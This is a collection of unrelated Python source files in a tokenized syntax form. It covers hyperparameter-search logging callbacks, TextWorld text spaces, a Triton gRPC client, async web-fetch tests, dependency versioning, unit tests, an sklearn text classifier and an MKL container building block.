mode<block_start><return>open(file_path mode=mode)<block_end>@staticmethod<def_stmt>mkdirs dir_path exist_ok<block_start>os.makedirs(dir_path exist_ok=exist_ok)<block_end><def_stmt>_prepare_output_dir self log_dir searcher<block_start><if_stmt>log_dir<is><none><block_start>log_dir='log'<block_end><if_stmt>log_dir[-1]<eq>'/'<block_start>log_dir=log_dir[:-1]<block_end>running_dir=f'exp_{searcher.__class__.__name__}_{datetime.datetime.now().__format__("%m%d-%H%M%S")}'<line_sep>output_path=os.path.expanduser(f'{log_dir}/{running_dir}')<line_sep>self.mkdirs(output_path exist_ok=<true>)<line_sep><return>output_path<block_end><def_stmt>on_build_estimator self hyper_model space estimator trial_no<block_start><pass><block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start><pass><line_sep># with open(f'{self.output_dir}/trial_{trial_no}.log', 'w') as f: # f.write(space.params_summary()) <block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start><with_stmt>self.open(f'{self.output_dir}/trial_{improved}_{trial_no:04d}_{reward:010.8f}_{elapsed:06.2f}.log' 'w')<as>f<block_start>f.write(space.params_summary())<line_sep>f.write('\r\n----------------Summary for Searcher----------------\r\n')<line_sep>f.write(hyper_model.searcher.summary())<block_end>topn=10<line_sep>diff=hyper_model.history.diff(hyper_model.history.get_top(topn))<with_stmt>self.open(f'{self.output_dir}/top_{topn}_diff.txt' 'w')<as>f<block_start>diff_str=json.dumps(diff indent=5)<line_sep>f.write(diff_str)<line_sep>f.write('\r\n')<line_sep>f.write(hyper_model.searcher.summary())<block_end><with_stmt>self.open(f'{self.output_dir}/top_{topn}_config.txt' 'w')<as>f<block_start>trials=hyper_model.history.get_top(topn)<line_sep>configs=hyper_model.export_configuration(trials)<for_stmt>trial,conf zip(trials configs)<block_start>f.write(f'Trial No: {trial.trial_no}, Reward: {trial.reward}\r\n')<line_sep>f.write(conf)<line_sep>f.write('\r\n---------------------------------------------------\r\n\r\n')<block_end><block_end><block_end><def_stmt>on_skip_trial self hyper_model space trial_no reason reward improved elapsed<block_start><with_stmt>self.open(f'{self.output_dir}/trial_{reason}_{improved}_{trial_no:04d}_{reward:010.8f}_{elapsed:06.2f}.log' 'w')<as>f<block_start>f.write(space.params_summary())<block_end>topn=5<line_sep>diff=hyper_model.history.diff(hyper_model.history.get_top(topn))<with_stmt>self.open(f'{self.output_dir}/top_{topn}_diff.txt' 'w')<as>f<block_start>diff_str=json.dumps(diff indent=5)<line_sep>f.write(diff_str)<block_end><block_end><block_end><class_stmt>FileStorageLoggingCallback(FileLoggingCallback)<block_start>@staticmethod<def_stmt>open file_path mode<block_start><return>fs.open(file_path mode=mode)<block_end>@staticmethod<def_stmt>mkdirs dir_path exist_ok<block_start>fs.mkdirs(dir_path exist_ok=exist_ok)<block_end><block_end><class_stmt>SummaryCallback(Callback)<block_start><def_stmt>__init__ self<block_start>super(SummaryCallback self).__init__()<line_sep>self.start_search_time=<none><block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start>self.start_search_time=time.time()<block_end><def_stmt>on_build_estimator self hyper_model space estimator trial_no# if logger.is_info_enabled(): # logger.info(f'\nTrial No:{trial_no}') # logger.info(space.params_summary()) <block_start>estimator.summary()<block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start><if_stmt>logger.is_info_enabled()<block_start>msg=f'\nTrial No:{trial_no}{space.params_summary()}\ntrial {trial_no} begin'<line_sep>logger.info(msg)<block_end><block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start><if_stmt>logger.is_info_enabled()<block_start>logger.info(f'trial end. reward:{reward}, improved:{improved}, elapsed:{elapsed}')<line_sep>logger.info(f'Total elapsed:{time.time()-self.start_search_time}')<block_end><block_end><def_stmt>on_skip_trial self hyper_model space trial_no reason reward improved elapsed<block_start><if_stmt>logger.is_info_enabled()<block_start>logger.info(f'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')<line_sep>logger.info(f'trial skip. reason:{reason}, reward:{reward}, improved:{improved}, elapsed:{elapsed}')<line_sep>logger.info(f'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')<block_end><block_end><block_end><class_stmt>NotebookCallback(Callback)<block_start><def_stmt>__init__ self<block_start>super(NotebookCallback self).__init__()<line_sep>self.current_trial_display_id=<none><line_sep>self.search_summary_display_id=<none><line_sep>self.best_trial_display_id=<none><line_sep>self.title_display_id=<none><line_sep>self.last_trial_no=0<line_sep>self.last_reward=0<line_sep>self.start_time=0<line_sep>self.max_trials=0<block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start>self.start_time=time.time()<line_sep>self.max_trials=max_trials<line_sep>df_holder=pd.DataFrame()<line_sep>settings={'X':X.shape 'y':y.shape 'X_eval':X_eval.shape<if>X_eval<is><not><none><else><none> 'y_eval':y_eval.shape<if>y_eval<is><not><none><else><none> 'cv':cv 'num_folds':num_folds 'max_trials':max_trials # 'dataset_id': dataset_id, # 'trail_store': trial_store, 'fit_kwargs':fit_kwargs.keys()}<line_sep>df_settings=pd.DataFrame({k:[v]<for>k,v settings.items()})<line_sep>display_markdown('#### Experiment Settings:' raw=<true>)<line_sep>display(hyper_model display_id=<false>)<line_sep>display(df_settings display_id=<false>)<line_sep>display_markdown('#### Trials Summary:' raw=<true>)<line_sep>handle=display(df_holder display_id=<true>)<if_stmt>handle<is><not><none><block_start>self.search_summary_display_id=handle.display_id<block_end>display_markdown('#### Best Trial:' raw=<true>)<line_sep>handle=display(df_holder display_id=<true>)<if_stmt>handle<is><not><none><block_start>self.best_trial_display_id=handle.display_id<block_end>handle=display({'text/markdown':'#### Current Trial:'} raw=<true> include=['text/markdown'] display_id=<true>)<if_stmt>handle<is><not><none><block_start>self.title_display_id=handle.display_id<block_end>handle=display(df_holder display_id=<true>)<if_stmt>handle<is><not><none><block_start>self.current_trial_display_id=handle.display_id<block_end><block_end><def_stmt>on_trial_begin self hyper_model space trial_no<block_start>df_summary=pd.DataFrame([(trial_no self.last_reward hyper_model.best_trial_no hyper_model.best_reward time.time()-self.start_time len([t<for>t hyper_model.history.trials<if>t.succeeded]) self.max_trials)] columns=['Trial No.' 'Previous reward' 'Best trial' 'Best reward' 'Total elapsed' 'Valid trials' 'Max trials'])<if_stmt>self.search_summary_display_id<is><not><none><block_start>update_display(df_summary display_id=self.search_summary_display_id)<block_end><if_stmt>self.current_trial_display_id<is><not><none><block_start>update_display(space display_id=self.current_trial_display_id)<block_end><block_end><def_stmt>on_search_end self hyper_model<block_start>df_summary=pd.DataFrame([(self.last_trial_no self.last_reward hyper_model.best_trial_no hyper_model.best_reward time.time()-self.start_time len([t<for>t hyper_model.history.trials<if>t.succeeded]) self.max_trials)] columns=['Trial No.' 'Previous reward' 'Best trial' 'Best reward' 'Total elapsed' 'Valid trials' 'Max trials'])<if_stmt>self.search_summary_display_id<is><not><none><block_start>update_display(df_summary display_id=self.search_summary_display_id)<block_end><if_stmt>self.title_display_id<is><not><none><block_start>update_display({'text/markdown':'#### Top trials:'} raw=<true> include=['text/markdown'] display_id=self.title_display_id)<block_end>df_best_trials=pd.DataFrame([(t.trial_no t.reward t.elapsed t.space_sample.vectors)<for>t hyper_model.get_top_trials(5)] columns=['Trial No.' 'Reward' 'Elapsed' 'Space Vector'])<if_stmt>self.current_trial_display_id<is><not><none><block_start>update_display(df_best_trials display_id=self.current_trial_display_id)<block_end><block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start>self.last_trial_no=trial_no<line_sep>self.last_reward=reward<line_sep>best_trial=hyper_model.get_best_trial()<if_stmt>best_trial<is><not><none><and>self.best_trial_display_id<is><not><none><block_start>update_display(best_trial.space_sample display_id=self.best_trial_display_id)<block_end><block_end><def_stmt>on_trial_error self hyper_model space trial_no<block_start>self.last_trial_no=trial_no<line_sep>self.last_reward='ERR'<block_end><block_end><class_stmt>ProgressiveCallback(Callback)<block_start><def_stmt>__init__ self<block_start>super(ProgressiveCallback self).__init__()<line_sep>self.pbar=<none><block_end><def_stmt>on_search_start self hyper_model X y X_eval y_eval cv num_folds max_trials dataset_id trial_store **fit_kwargs<block_start>self.pbar=tqdm(total=max_trials leave=<false> desc='search')<block_end><def_stmt>on_search_end self hyper_model<block_start>self.pbar.update(self.pbar.total)<line_sep>self.pbar.close()<line_sep>self.pbar=<none><block_end><def_stmt>on_search_error self hyper_model<block_start>self.on_search_end(hyper_model)<block_end><def_stmt>on_trial_end self hyper_model space trial_no reward improved elapsed<block_start>self.pbar.update(1)<block_end><def_stmt>on_trial_error self hyper_model space trial_no<block_start>self.pbar.update(1)<block_end><block_end>
<import_stmt>re<import_stmt>string<import_stmt>numpy<as>np<import_stmt>gym<import_stmt>gym.spaces<class_stmt>VocabularyHasDuplicateTokens(ValueError)<block_start><pass><block_end><class_stmt>Char(gym.spaces.MultiDiscrete)<block_start>""" Character observation/action space This space consists of a series of `gym.spaces.Discrete` objects all with the same parameters. Each `gym.spaces.Discrete` can take integer values between 0 and len(self.vocab). Notes ----- The following special token will be prepended (if needed) to the vocabulary: * '#' : Padding token """<def_stmt>__init__ self max_length vocab=<none> extra_vocab=[]<block_start>""" Parameters ---------- max_length : int Maximum number of characters in a text. vocab : list of char, optional Vocabulary defining this space. It shouldn't contain any duplicate characters. If not provided, the vocabulary will consists in characters [a-z0-9], punctuations [" ", "-", "'"] and padding '#'. extra_vocab : list of char, optional Additional tokens to add to the vocabulary. """<if_stmt>vocab<is><none><block_start>vocab=list(string.ascii_lowercase+string.digits)<line_sep>vocab<augadd>[" " "-" "'"]<block_end>vocab<augadd>extra_vocab<if_stmt>len(vocab)<ne>len(set(vocab))<block_start><raise>VocabularyHasDuplicateTokens()<block_end>self.max_length=max_length<line_sep>self.PAD="#"<line_sep>special_tokens=[self.PAD]<line_sep>self.vocab=[t<for>t special_tokens<if>t<not><in>vocab]<line_sep>self.vocab<augadd>list(vocab)<line_sep>self.vocab_set=set(self.vocab)# For faster lookup. self.vocab_size=len(self.vocab)<line_sep>self.id2c={i:c<for>i,c enumerate(self.vocab)}<line_sep>self.c2id={c:i<for>i,c self.id2c.items()}<line_sep>self.PAD_id=self.c2id[self.PAD]<line_sep>super().__init__([len(self.vocab)-1]<times>self.max_length)<line_sep>self.dtype=np.int64<block_end># Overwrite Gym's dtype=int8. <def_stmt>filter_unknown self text<block_start>""" Strip out all characters not in the vocabulary. """<line_sep><return>"".join(c<for>c text<if>c<in>self.vocab_set)<block_end><def_stmt>tokenize self text padding=<false><block_start>""" Tokenize characters found in the vocabulary. Note: text will be padded up to `self.max_length`. """<line_sep>text=self.filter_unknown(text.lower())<line_sep>ids=[self.c2id[c]<for>c text]<line_sep># Add padding. <if_stmt>padding<block_start>nb_pads=self.max_length-len(ids)<line_sep>msg="Provided `max_length` was not large enough ({} chars).".format(len(ids))<assert_stmt>nb_pads<ge>0 msg<line_sep>ids<augadd>[self.PAD_id]<times>nb_pads<block_end><return>np.array(ids)<block_end><def_stmt>__repr__ self<block_start><return>"Character({})".format(self.max_length)<block_end><block_end><class_stmt>Word(gym.spaces.MultiDiscrete)<block_start>""" Word observation/action space This space consists of a series of `gym.spaces.Discrete` objects all with the same parameters. Each `gym.spaces.Discrete` can take integer values between 0 and `len(self.vocab)`. Notes ----- The following special tokens will be prepended (if needed) to the vocabulary: * '<PAD>' : Padding * '<UNK>' : Unknown word * '<S>' : Beginning of sentence * '</S>' : End of sentence Example ------- Let's create an action space that can be used with :py:meth:`textworld.gym.register_game <textworld.gym.utils.register_game>`. We are going to assume actions are short phrases up to 8 words long. >>> import textworld >>> gamefiles = ["/path/to/game.ulx", "/path/to/another/game.z8"] >>> vocab = textworld.vocab.extract_from(gamefiles) >>> vocab = sorted(vocab) # Sorting the vocabulary, optional. >>> action_space = textworld.gym.text_spaces.Word(max_length=8, vocab=vocab) """<def_stmt>__init__ self max_length vocab<block_start>""" Parameters ---------- max_length : int Maximum number of words in a text. vocab : list of strings Vocabulary defining this space. It shouldn't contain any duplicate words. """<if_stmt>len(vocab)<ne>len(set(vocab))<block_start><raise>VocabularyHasDuplicateTokens()<block_end>self.max_length=max_length<line_sep>self.PAD="<PAD>"<line_sep>self.UNK="<UNK>"<line_sep>self.BOS="<S>"<line_sep>self.EOS="</S>"<line_sep>self.SEP="<|>"<line_sep>special_tokens=[self.PAD self.UNK self.EOS self.BOS self.SEP]<line_sep>self.vocab=[w<for>w special_tokens<if>w<not><in>vocab]<line_sep>self.vocab<augadd>list(vocab)<line_sep>self.vocab_set=set(self.vocab)# For faster lookup. self.vocab_size=len(self.vocab)<line_sep>self.id2w={i:w<for>i,w enumerate(self.vocab)}<line_sep>self.w2id={w:i<for>i,w self.id2w.items()}<line_sep>self.PAD_id=self.w2id[self.PAD]<line_sep>self.UNK_id=self.w2id[self.UNK]<line_sep>self.BOS_id=self.w2id[self.BOS]<line_sep>self.EOS_id=self.w2id[self.EOS]<line_sep>self.SEP_id=self.w2id[self.SEP]<line_sep>super().__init__([len(self.vocab)-1]<times>self.max_length)<line_sep>self.dtype=np.int64<block_end># Overwrite Gym's dtype=int8. <def_stmt>tokenize self text padding=<false><block_start>""" Tokenize words found in the vocabulary. Note: text will be padded up to `self.max_length`. """<line_sep>text=text.lower()# Work only with lowercase letters. # Find beginning and end of sentences. text=text.replace("." " </S> <S> ")<line_sep>text="<S> "+text+" </S>"<line_sep># Strip out all non-alphabetic characters. text=text.replace("'" "")<line_sep>text=re.sub("[^a-z0-9 <S>/]" " " text)<line_sep># TODO: convert numbers to text? # Get words ids and replace unknown words with <UNK>. words=text.split()<line_sep>ids=[self.w2id.get(w self.UNK_id)<for>w words]<line_sep># Add padding. <if_stmt>padding<block_start>nb_pads=self.max_length-len(ids)<line_sep>msg="Provided `max_length` was not large enough ({} words).".format(len(ids))<assert_stmt>nb_pads<ge>0 msg<line_sep>ids<augadd>[self.PAD_id]<times>nb_pads<block_end><return>np.array(ids)<block_end><def_stmt>__repr__ self<block_start><return>"Word(L={}, V={})".format(self.max_length self.vocab_size)<block_end><block_end>
<import_stmt>numpy<as>np<import_stmt>cv2<import_stmt>grpc<import_from_stmt>tritonclient.grpc service_pb2 service_pb2_grpc<import_stmt>tritonclient.grpc.model_config_pb2<as>mc<line_sep>np.random.seed(123)<line_sep>palette=np.random.randint(0 256 (100 3))<line_sep># url = '10.128.61.7:8001' url='127.0.0.1:8001'<line_sep>model_name='bisenetv2'<line_sep>model_version='1'<line_sep>inp_name='input_image'<line_sep>outp_name='preds'<line_sep>inp_dtype='FP32'<line_sep>outp_dtype=np.int64<line_sep>inp_shape=[1 3 1024 2048]<line_sep>outp_shape=[1024 2048]<line_sep>impth='../example.png'<line_sep>mean=[0.3257 0.3690 0.3223]# city, rgb std=[0.2112 0.2148 0.2115]<line_sep>option=[('grpc.max_receive_message_length' 1073741824) ('grpc.max_send_message_length' 1073741824) ]<line_sep>channel=grpc.insecure_channel(url options=option)<line_sep>grpc_stub=service_pb2_grpc.GRPCInferenceServiceStub(channel)<line_sep>metadata_request=service_pb2.ModelMetadataRequest(name=model_name version=model_version)<line_sep>metadata_response=grpc_stub.ModelMetadata(metadata_request)<line_sep>print(metadata_response)<line_sep>config_request=service_pb2.ModelConfigRequest(name=model_name version=model_version)<line_sep>config_response=grpc_stub.ModelConfig(config_request)<line_sep>print(config_response)<line_sep>request=service_pb2.ModelInferRequest()<line_sep>request.model_name=model_name<line_sep>request.model_version=model_version<line_sep>inp=service_pb2.ModelInferRequest().InferInputTensor()<line_sep>inp.name=inp_name<line_sep>inp.datatype=inp_dtype<line_sep>inp.shape.extend(inp_shape)<line_sep>mean=np.array(mean).reshape(1 1 3)<line_sep>std=np.array(std).reshape(1 1 3)<line_sep>im=cv2.imread(impth)[: : ::-1]<line_sep>im=cv2.resize(im dsize=tuple(inp_shape[-1:-3:-1]))<line_sep>im=((im/255.)-mean)/std<line_sep>im=im[<none> <ellipsis>].transpose(0 3 1 2)<line_sep>inp_bytes=im.astype(np.float32).tobytes()<line_sep>request.ClearField("inputs")<line_sep>request.ClearField("raw_input_contents")<line_sep>request.inputs.extend([inp ])<line_sep>request.raw_input_contents.extend([inp_bytes ])<line_sep>outp=service_pb2.ModelInferRequest().InferRequestedOutputTensor()<line_sep>outp.name=outp_name<line_sep>request.outputs.extend([outp ])<line_sep># sync # resp = grpc_stub.ModelInfer(request).raw_output_contents[0] # async resp=grpc_stub.ModelInfer.future(request)<line_sep>resp=resp.result().raw_output_contents[0]<line_sep>out=np.frombuffer(resp dtype=outp_dtype).reshape(*outp_shape)<line_sep>out=palette[out]<line_sep>cv2.imwrite('res.png' out)<line_sep>
# coding: utf-8 <import_from_stmt>AsyncIteratorWrapper AsyncIteratorWrapper<import_stmt>asyncio<import_stmt>functools<import_stmt>aiohttp<import_stmt>tornado.web<import_from_stmt>tornado.platform.asyncio AsyncIOMainLoop<import_from_stmt>threading Thread<line_sep>headers={"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" "Accept-Encoding":"gzip, deflate, sdch" "Accept-Language":"zh-CN,zh;q=0.8" "Upgrade-Insecure-Requests":"1" "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" }<line_sep>session=aiohttp.ClientSession(headers=headers)<line_sep>f=open('./tmp.txt' 'a' encoding='utf-8')<def_stmt>printer future<block_start>print(future.result()[0])<line_sep>f.write(future.result()[1])<line_sep>print('done')<block_end><async_keyword><def_stmt>producer <block_start>future=asyncio.run_coroutine_threadsafe(coro() worker_loop)<line_sep>future.add_done_callback(functools.partial(printer))<line_sep><await>asyncio.sleep(0)<block_end><async_keyword><def_stmt>coro <block_start><async_keyword><with_stmt>session.get("https://www.internationalsaimoe.com" ssl=<false>)<as>res<block_start>text=<await>res.text()<line_sep><return>[res.status text]<block_end><block_end><class_stmt>MainHandler(tornado.web.RequestHandler)<block_start><async_keyword><def_stmt>get self<block_start><async_keyword><for_stmt>i AsyncIteratorWrapper(range(1))<block_start>future=asyncio.run_coroutine_threadsafe(coro() worker_loop)<line_sep>future.add_done_callback(functools.partial(printer))<line_sep>#await producer() #await asyncio.run_coroutine_threadsafe(coro(), loop) <block_end>#text = await asyncio.get_event_loop().create_task(coro()) #self.write(text) self.finish('It works!')<block_end><def_stmt>post self<block_start>print(self.request.body)<line_sep>#data=self.get_argument('data') #print(data) self.write('收到POST')<line_sep>print('收到POST')<block_end><block_end><def_stmt>start_loop loop# 运行事件循环, loop以参数的形式传递进来运行 <block_start>loop.run_forever()<block_end><if_stmt>__name__<eq>"__main__"<block_start>AsyncIOMainLoop().install()<line_sep>app=tornado.web.Application([(r"/" MainHandler)])<line_sep>app.listen(8888)<line_sep>print('TornadoTestAsync2@localhost:8888')<line_sep>producer_loop=asyncio.get_event_loop()<line_sep>tornadoThread=Thread(target=start_loop args=(producer_loop ))#生产者 tornadoThread.start()#启动生产者tornado worker_loop=asyncio.get_event_loop()<block_end>
""" Functions for finding the version of a dependency. Classes ------- BaseDependency - base class for holding information about a program component. Functions --------- find_version_from_versioncontrol - determines whether a file is under version control, and if so, obtains version information from this. find_version() - tries to find version information by calling a series of functions in turn. :copyright: Copyright 2006-2015 by the Sumatra team, see doc/authors.txt :license: BSD 2-clause, see LICENSE for details. """<import_from_future_stmt> unicode_literals<import_from_stmt>builtins object<import_stmt>os<import_from_stmt>sumatra versioncontrol<def_stmt>find_versions_from_versioncontrol dependencies<block_start>"""Determine whether a file is under version control, and if so, obtain version information from this."""<for_stmt>dependency dependencies<block_start><if_stmt>dependency.version<eq>"unknown"<block_start><try_stmt><block_start>wc=versioncontrol.get_working_copy(dependency.path)<block_end><except_stmt>versioncontrol.VersionControlError<block_start><pass># dependency.version remains "unknown" <block_end><else_stmt><block_start><if_stmt>wc.has_changed()<block_start>dependency.diff=wc.diff()<block_end>dependency.version=wc.current_version()<line_sep>dependency.source=wc.repository.url<block_end><block_end><block_end><return>dependencies<block_end># add support for using packaging systems, e.g. apt, to find versions. # add support for looking for Subversion $Id:$ tags, etc. <def_stmt>find_versions dependencies heuristics<block_start>""" Try to find version information by calling a series of functions in turn. *dependencies*: a list of Dependency objects. *heuristics*: a list of functions that accept a component as the single argument and return a version number or 'unknown'. Returns a possibly modified list of dependencies """<for_stmt>heuristic heuristics<block_start>dependencies=heuristic(dependencies)<block_end><return>dependencies<block_end><def_stmt>find_file path current_directory search_dirs<block_start>""" Look for path as an absolute path then relative to the current directory, then relative to *search_dirs*. Return the absolute path. """<line_sep>op=os.path<if_stmt>op.exists(path)<block_start><return>op.abspath(path)<block_end><for_stmt>dir [current_directory]+search_dirs<block_start>search_path=op.join(dir path)<if_stmt>op.exists(search_path)<block_start><return>search_path<block_end><block_end><raise>IOError("File %s does not exist"%path)<block_end><class_stmt>BaseDependency(object)<block_start>""" Contains information about a program component, and tries to determine version information. *name*: an identifying name, e.g. the module name in Python *path*: the location of the dependency file in the local filesystem *version*: the version of the dependency, if that can be determined, otherwise 'unknown'. Always a string, even if the version can also be represented as a number. *diff*: if the dependency is under version control and has been modified, the diff between the actual version and the last-committed version. *source*: an identifier for where the dependency came from, if known, e.g. the url of a version control repository or the name of a Linux package. """<def_stmt>__init__ self name path=<none> version='unknown' diff='' source=<none><block_start>self.name=name<line_sep>self.path=path<line_sep>self.diff=diff<line_sep>self.version=version<line_sep>self.source=source<block_end># e.g. url of (upstream?) repository <def_stmt>__repr__ self<block_start><return>"%s (%s) version=%s%s"%(self.name self.path self.version self.diff<and>"*"<or>'')<block_end><def_stmt>__eq__ self other<block_start><return>self.name<eq>other.name<and>self.path<eq>other.path<and>self.version<eq>other.version<and>self.diff<eq>other.diff<block_end><def_stmt>__ne__ self other<block_start><return><not>self.__eq__(other)<block_end><def_stmt>__hash__ self<block_start><return>hash(self.name)^hash(self.path)^hash(self.version)^hash(self.diff)<block_end><block_end>
<import_from_stmt>typing Optional<import_from_stmt>typing cast<import_from_stmt>.inputs.input Input<import_from_stmt>.io IO<import_from_stmt>.outputs.buffered_output BufferedOutput<class_stmt>BufferedIO(IO)<block_start><def_stmt>__init__ self input:Optional[Input]=<none> decorated:bool=<false> supports_utf8:bool=<true> <arrow><none><block_start>super(BufferedIO self).__init__(input BufferedOutput(decorated=decorated supports_utf8=supports_utf8) BufferedOutput(decorated=decorated supports_utf8=supports_utf8) )<line_sep>self._output=cast(BufferedOutput self._output)<line_sep>self._error_output=cast(BufferedOutput self._error_output)<block_end><def_stmt>fetch_output self<arrow>str<block_start><return>self._output.fetch()<block_end><def_stmt>fetch_error self<arrow>str<block_start><return>self._error_output.fetch()<block_end><def_stmt>clear self<arrow><none><block_start>self._output.clear()<line_sep>self._error_output.clear()<block_end><def_stmt>clear_output self<arrow><none><block_start>self._output.clear()<block_end><def_stmt>clear_error self<arrow><none><block_start>self._error_output.clear()<block_end><def_stmt>supports_utf8 self<arrow>bool<block_start><return>self._output.supports_utf8()<block_end><def_stmt>clear_user_input self<arrow><none><block_start>self._input.stream.truncate(0)<line_sep>self._input.stream.seek(0)<block_end><def_stmt>set_user_input self user_input:str<arrow><none><block_start>self.clear_user_input()<line_sep>self._input.stream.write(user_input)<line_sep>self._input.stream.seek(0)<block_end><block_end>
<import_stmt>unittest<import_from_stmt>mock Mock<import_from_stmt>foundations_events.consumers.jobs.queued.creation_time CreationTime<class_stmt>TestCreationTime(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self._redis=Mock()<line_sep>self._consumer=CreationTime(self._redis)<block_end><def_stmt>test_call_saves_creation_time self<block_start>self._consumer.call({'job_id':'space pinball'} 34344 <none>)<line_sep>self._redis.set.assert_called_with('jobs:space pinball:creation_time' '34344')<block_end><def_stmt>test_call_saves_creation_time_different_job_id self<block_start>self._consumer.call({'job_id':'dimensional pinball'} 34344 <none>)<line_sep>self._redis.set.assert_called_with('jobs:dimensional pinball:creation_time' '34344')<block_end><def_stmt>test_call_saves_creation_time_different_time self<block_start>self._consumer.call({'job_id':'space pinball'} 99999 <none>)<line_sep>self._redis.set.assert_called_with('jobs:space pinball:creation_time' '99999')<block_end><block_end>
<def_stmt>app # pragma: no cover <block_start><return><none><block_end><def_stmt>returns_app # pragma: no cover <block_start><return>app<block_end>
<import_stmt>pytest<import_from_stmt>osp.common.utils parse_domain<line_sep>@pytest.mark.parametrize('url,domain' [# Unchanged ('test.edu' 'test.edu' ) # Strip protocol ('http://test.edu' 'test.edu' ) ('https://test.edu' 'test.edu' ) # Stip subdomains ('www.test.edu' 'test.edu' ) ('sub.test.edu' 'test.edu' ) # Strip path ('http://test.edu/syllabus.pdf' 'test.edu' ) # Strip whitespace (' http://test.edu ' 'test.edu' ) # Downcase ('WWW.TEST.EDU' 'test.edu' ) # Take second domain in embedded URLs ('https://web.archive.org/123/http:/test.edu/syllabus.pdf' 'test.edu' ) ('https://web.archive.org/123/https:/test.edu/syllabus.pdf' 'test.edu' ) ])<def_stmt>test_parse_domain url domain<block_start><assert_stmt>parse_domain(url)<eq>domain<block_end>
<import_from_stmt>sklearn.datasets fetch_20newsgroups<import_from_stmt>sklearn.pipeline Pipeline<import_from_stmt>sklearn.feature_extraction.text TfidfTransformer CountVectorizer<import_from_stmt>sklearn.naive_bayes MultinomialNB<import_stmt>numpy<as>np<import_stmt>joblib<def_stmt>fetch_data <block_start>categories=["alt.atheism" "soc.religion.christian" "comp.graphics" "sci.med"]<line_sep>twenty_train=fetch_20newsgroups(subset="train" categories=categories shuffle=<true> random_state=42)<line_sep>twenty_test=fetch_20newsgroups(subset="test" categories=categories shuffle=<true> random_state=42)<line_sep><return>twenty_train twenty_test<block_end><def_stmt>build_train_model twenty_train<block_start>text_clf=Pipeline([("vect" CountVectorizer()) ("tfidf" TfidfTransformer()) ("clf" MultinomialNB()) ])<line_sep>text_clf.fit(twenty_train.data twenty_train.target)<line_sep><return>text_clf<block_end><def_stmt>print_accuracy twenty_test text_clf<block_start>predicted=text_clf.predict(twenty_test.data)<line_sep>print(f"Accuracy: {np.mean(predicted<eq>twenty_test.target):.2f}")<block_end><def_stmt>save_model text_clf<block_start>joblib.dump(text_clf "src/model.joblib")<block_end><if_stmt>__name__<eq>"__main__"<block_start>twenty_train,twenty_test=fetch_data()<line_sep>text_clf=build_train_model(twenty_train)<line_sep>print_accuracy(twenty_test text_clf)<line_sep>save_model(text_clf)<block_end>
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=invalid-name, too-few-public-methods # pylint: disable=too-many-instance-attributes """MKL building block"""<import_from_future_stmt> absolute_import<import_from_future_stmt> unicode_literals<import_from_future_stmt> print_function<import_stmt>logging# pylint: disable=unused-import <import_stmt>hpccm.config<import_stmt>hpccm.templates.envvars<import_stmt>hpccm.templates.wget<import_from_stmt>hpccm.building_blocks.base bb_base<import_from_stmt>hpccm.building_blocks.packages packages<import_from_stmt>hpccm.common cpu_arch linux_distro<import_from_stmt>hpccm.primitives.comment comment<import_from_stmt>hpccm.primitives.environment environment<import_from_stmt>hpccm.primitives.shell shell<class_stmt>mkl(bb_base hpccm.templates.envvars hpccm.templates.wget)<block_start>"""The `mkl` building block downloads and installs the [Intel Math Kernel Library](http://software.intel.com/mkl). You must agree to the [Intel End User License Agreement](https://software.intel.com/en-us/articles/end-user-license-agreement) to use this building block. # Parameters environment: Boolean flag to specify whether the environment (`LD_LIBRARY_PATH`, `PATH`, and other variables) should be modified to include MKL. The default is True. eula: By setting this value to `True`, you agree to the [Intel End User License Agreement](https://software.intel.com/en-us/articles/end-user-license-agreement). The default value is `False`. mklvars: MKL provides an environment script (`mklvars.sh`) to setup the MKL environment. If this value is `True`, the bashrc is modified to automatically source this environment script. However, the MKL environment is not automatically available to subsequent container image build steps; the environment is available when the container image is run. To set the MKL environment in subsequent build steps you can explicitly call `source /opt/intel/mkl/bin/mklvars.sh intel64` in each build step. If this value is to set `False`, then the environment is set such that the environment is visible to both subsequent container image build steps and when the container image is run. However, the environment may differ slightly from that set by `mklvars.sh`. The default value is `True`. ospackages: List of OS packages to install prior to installing MKL. For Ubuntu, the default values are `apt-transport-https`, `ca-certificates`, `gnupg`, and `wget`. For RHEL-based Linux distributions, the default is an empty list. version: The version of MKL to install. The default value is `2020.0-088`. # Examples ```python mkl(eula=True, version='2018.3-051') ``` """<def_stmt>__init__ self **kwargs<block_start>"""Initialize building block"""<line_sep>super(mkl self).__init__(**kwargs)<line_sep># By setting this value to True, you agree to the # corresponding Intel End User License Agreement # (https://software.intel.com/en-us/articles/end-user-license-agreement) self.__eula=kwargs.get('eula' <false>)<line_sep>self.__mklvars=kwargs.get('mklvars' <true>)<line_sep>self.__ospackages=kwargs.get('ospackages' [])<line_sep>self.__version=kwargs.get('version' '2020.0-088')<line_sep>self.__year='2019'# Also used by 2018 and 2020 versions self.__bashrc=''# Filled in by __distro() <if_stmt>hpccm.config.g_cpu_arch<ne>cpu_arch.X86_64# pragma: no cover <block_start>logging.warning('Using mkl on a non-x86_64 processor')<block_end># Set the Linux distribution specific parameters self.__distro()<line_sep># Fill in container instructions 